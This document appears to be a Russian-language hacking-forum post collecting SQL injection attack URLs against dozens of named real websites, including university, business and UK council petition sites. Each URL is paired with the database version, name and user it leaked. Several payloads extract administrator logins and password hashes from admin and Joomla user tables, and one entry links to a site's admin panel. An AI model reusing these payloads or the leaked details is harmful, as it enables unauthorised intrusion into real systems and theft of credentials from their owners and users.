SQL Инъекции

http://www.disabilityconsultants.org.au/findconsultant.php?command=showbigconsultant&itemtypeid=6&consultantsid=-6+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--

Database Version: 5.0.81-community
Database name: disabili_disabilityconsultants
User name: disabili_chris@localhost
Os : pc-linux-gnu

 

http://www.entacom.com.au/?p=catalog&c=21&s=-658+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12--&v=RZ-DESTRUCTOR



Database Version: 4.1.22-standard-log
Database name: scott_entacom
User name: scott_root@localhost
Os : unknown-linux-gnu

 

http://www.terminators.ru/index.php?mode=5&rw_key=-1+union+select+version(),user(),data base(),@@version_compile_os/*


Database Version: 4.1.22-log
Database name: wwwterminatorsru
User name: termin03@localhost
OS: portbld-freebsd6.2

 

http://www.campingworld.com.au/site/products.php?prodid=-154+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),17,18,19,20/*&iscatid=13&issubid=32


Database Version: 4.1.22
Database name: cms_db
User name: cmsuser@localhost
Os : redhat-linux-gnu

 

http://itp.nyu.edu PR 6

Code:

http://itp.nyu.edu/thesis/spring2007/stream.php?movieID=1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14/*

Database Version - 5.0.45-log
Database name - video_comments
User name - vc_update@localhost

 

http://mbantua[dot]com[dot]au
PR 5

http://mbantua[dot]com[dot]au/news.php?id=9999+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9--

user() = [email protected]
version() = 5.0.67-log
database() = Mbantua_website


пароль админа
http://mbantua[dot]com[dot]au/news.php?id=-55+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9+from+admin--

сама админка
http://mbantua[dot]com[dot]au/admin

 

kuba@localhost
5.0.68
ifr

dorosh_fuser@localhost
4.1.22-standard-log
dorosh_fm

 

Code:

http://www.etechnology.ru/mk.php?id=-1001+union+select+1,concat_ws(0x3a,version(),user(),database()),3

4.0.27-log:[email protected]:etechnology

Code:

http://www.swiss-luxury-world.ch/watches/en/watchbrands/marke/mk.php?md=405&id=-4+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4

вывод в тайтле

Code:

http://www.cmes.arizona.edu/resources/mp.php?id=-23+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31

4.0.12:cmes_web@localhost:cmes

Code:

http://www.rallyonline.pl/mp.php?1&&modex=pokaz&T[id]=-1163+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

5.1.30-log:mysql@localhost:rallyonline_utf

Code:

http://2b-i.co.uk/2B-me.php?id=-13+union+select+concat_ws(0x3a,version(),user(),database())

5.0.67-community:ibmys0_web2bi@localhost:ibmys0_db2bi

Code:

http://confident-image.co.uk/2B-me.php?id=-32+union+select+concat_ws(0x3a,version(),user(),database())

5.0.67-community:ibmys0_web2bi@localhost:ibmys0_db2bi

Code:

http://www.klara-rulikova.cz/volby-do-senatu-pisi-o-me.php?ID=-1+union+selecT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16

5.0.51a-3ubuntu5.4-log:[email protected]:klararulik

Code:

http://global-travel.mobi/hotels-my.php?id=4882+and+substring(version(),1,1)=5

Code:

http://www.latoi.com/my.php?user_id=2205&id=532+and+substring(version(),1,1)=4

Code:

http://www.tuk-tuk.com/member/my.php?id=198+and+substring(version(),1,1)=5

Code:

http://www.akademik-m.by/page.php?id=43+and+substring(version(),1,1)=5

 

nibulon_31@localhost
5.0.67-0ubuntu6
nibulon_31

komsomol_alex@localhost
5.0.77-community
komsomol_komsomol

 

User: athletics@localhost
Version: 5.0.45
Dbname: athletics_main

 

Version: 5.0.67

 

http://www.avto-tyre.ru/item_view.php?item_id=-1407+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+--+

http://www.elmash-holding.ru/elmcatalog/item/?item_id=473+union+select+1,2,3,4,database(),6,7+/*+
elektromash

http://www.elmh.ru/elmcatalog/item/?item_id=453+union+select+1,2,3,4,version(),6,7+/*+
4.0.27-log

Tic 1000
http://www.litsovet.ru/index.php/litob.journal.view?item_id=-193+UNION+SELECT+1,2,3,concat_ws(0x3a3a,admin_login,admin_psw,admin_name,admin_mail),5,6,7,8,9,10,11,12,13,14,15+from+tbl_admin+--+
litob.journal.view?item_id=-193+UNION+SELECT+1,2,3,concat_ws(0x3a3a,admin_id,admin_name,admin_login,admin_password,admin_status),5,6,7,8,9,10,11,12,13,14,15+from+admin+--+

 

Powered by phpBB2
mysql version: 4.1.20

 

imakorru
imakorru@localhost
5.0.51-Dotdeb_0.dotdeb.0-log

 

Увидел сегодня этот сайт в PHP-инъекциях. Думаю... Посмотрю: может че еще есть... Оказалось, что есть Да простит меня Adm1n4eG

VERSION(): 5.0.16
USER(): [email protected]
BAZA(): govor
OS(): portbld-freebsd6.0

Таблицы:
GAccess,GBase,GBaseImg,GHotLink,GHotel,GHotelImg,GNews,GNewsImg,GPlace,GPlaceB,GSeason,GTour,GTourImg,GType,forum,new,news

Колонки в таблице GAccess:
GAcId,GLog,GPass,GIP,GSet

А вот и долгожданный админ...

 

Code:

http://www.aikidoural.ru/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,%20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

Code:

http://tango.net.ua/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,%20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

 

Code:

http://avtos.su/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0%20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*

Code:

http://www.milkoff.ru/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0%20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*

 

Code:

http://www.suncity-travel.com/index.php?id=34+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11+limit+1,1/*

version():4.0.23a-log
database():suncity
user():scorp@localhost
__

Code:

http://www.mathrubhumi.org/travel/news.php?id=8935+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19

version():5.0.45
database():entravel
user():dedop@localhost
__

Code:

http://www.azores.com/travel/tour.php?id=56+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47++limit+1,1/*

version():5.0.45
database():azoresco
user():azoresco@localhost
__

Code:

http://soloentreamigas.com.ve/articulo.php?ID=60+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*

version():5.0.37-community-log
database():chicas
user():[email protected]
__

Code:

http://www.cavim.com.ve/pub.php?id=40+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18

version():5.0.51a-community-log
database():cavimc_cavim
user():cavimc_sa@localhost
__

Code:

http://epetitions.bristol.gov.uk/petition.php?id=166+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15

version():5.0.60-log
database():bristol_epetitioner
user():epetitioner_user@localhost